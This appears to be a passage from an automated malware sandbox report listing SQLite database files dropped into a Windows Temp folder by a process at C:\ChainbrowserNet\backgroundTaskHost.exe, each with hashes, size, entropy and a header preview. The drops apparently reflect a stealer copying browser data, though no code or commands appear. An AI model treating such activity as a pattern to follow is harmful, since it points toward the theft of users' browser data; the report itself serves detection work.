                                                                                          Entropy (8bit):0.9746603542602881
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\OSWi0lY6sq

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                          Category:dropped
                                                                                          Size (bytes):114688
                                                                                          Entropy (8bit):0.9746603542602881
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\OegBU0HWWq

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                          Category:dropped
                                                                                          Size (bytes):49152
                                                                                          Entropy (8bit):0.8180424350137764
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                          MD5:349E6EB110E34A08924D92F6B334801D
                                                                                          SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                          SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                          SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\PU4ELz59rI

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):106496
                                                                                          Entropy (8bit):1.1358696453229276
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\PcQPc3mfiO

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):106496
                                                                                          Entropy (8bit):1.1358696453229276
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\Pchsrpxxge

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                          Category:dropped
                                                                                          Size (bytes):114688
                                                                                          Entropy (8bit):0.9746603542602881
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\Q7Z9eu1fbA

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                          Category:dropped
                                                                                          Size (bytes):114688
                                                                                          Entropy (8bit):0.9746603542602881
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\QMCRUUGm2l

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                          Category:dropped
                                                                                          Size (bytes):28672
                                                                                          Entropy (8bit):2.5793180405395284
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                          MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                          SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                          SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                          SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\Qg1LMaGG2y

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                          Category:dropped
                                                                                          Size (bytes):49152
                                                                                          Entropy (8bit):0.8180424350137764
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                          MD5:349E6EB110E34A08924D92F6B334801D
                                                                                          SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                          SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                          SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\QurGPvjsIi

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):20480
                                                                                          Entropy (8bit):0.5707520969659783
                                                                                          Encrypted:false
                                                                                          SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                          MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                          SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                          SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                          SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\RBkO2qEViF

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                          Category:dropped
                                                                                          Size (bytes):49152
                                                                                          Entropy (8bit):0.8180424350137764
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                          MD5:349E6EB110E34A08924D92F6B334801D
                                                                                          SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                          SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                          SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\RROoHnqcaT

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):106496
                                                                                          Entropy (8bit):1.1358696453229276
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\RdN8LcASSs

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):20480
                                                                                          Entropy (8bit):0.5707520969659783
                                                                                          Encrypted:false
                                                                                          SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                          MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                          SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                          SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                          SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\S9R64jGQaO

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):106496
                                                                                          Entropy (8bit):1.1358696453229276
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\SHDR0JWiQq

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                          Category:dropped
                                                                                          Size (bytes):49152
                                                                                          Entropy (8bit):0.8180424350137764
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                          MD5:349E6EB110E34A08924D92F6B334801D
                                                                                          SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                          SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                          SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\SNrVU9zagI

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                          Category:dropped
                                                                                          Size (bytes):40960
                                                                                          Entropy (8bit):0.8553638852307782
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\SNxmQ9zwAR

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):106496
                                                                                          Entropy (8bit):1.1358696453229276
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\SQREmGvJUY

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):106496
                                                                                          Entropy (8bit):1.1358696453229276
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\SiExSoLhie

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                          Category:dropped
                                                                                          Size (bytes):114688
                                                                                          Entropy (8bit):0.9746603542602881
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\SvHfmgiXPq

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):20480
                                                                                          Entropy (8bit):0.5712781801655107
                                                                                          Encrypted:false
                                                                                          SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                          MD5:05A60B4620923FD5D53B9204391452AF
                                                                                          SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                          SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                          SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\TYoJogm3S1

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                          Category:dropped
                                                                                          Size (bytes):49152
                                                                                          Entropy (8bit):0.8180424350137764
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                          MD5:349E6EB110E34A08924D92F6B334801D
                                                                                          SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                          SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                          SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\Tq34MfArAn

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):20480
                                                                                          Entropy (8bit):0.5712781801655107
                                                                                          Encrypted:false
                                                                                          SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                          MD5:05A60B4620923FD5D53B9204391452AF
                                                                                          SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                          SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                          SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\U95b6aHFTP

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                          Category:dropped
                                                                                          Size (bytes):28672
                                                                                          Entropy (8bit):2.5793180405395284
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                          MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                          SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                          SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                          SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\UAFAzZTq2K

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                          Category:dropped
                                                                                          Size (bytes):28672
                                                                                          Entropy (8bit):2.5793180405395284
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                          MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                          SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                          SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
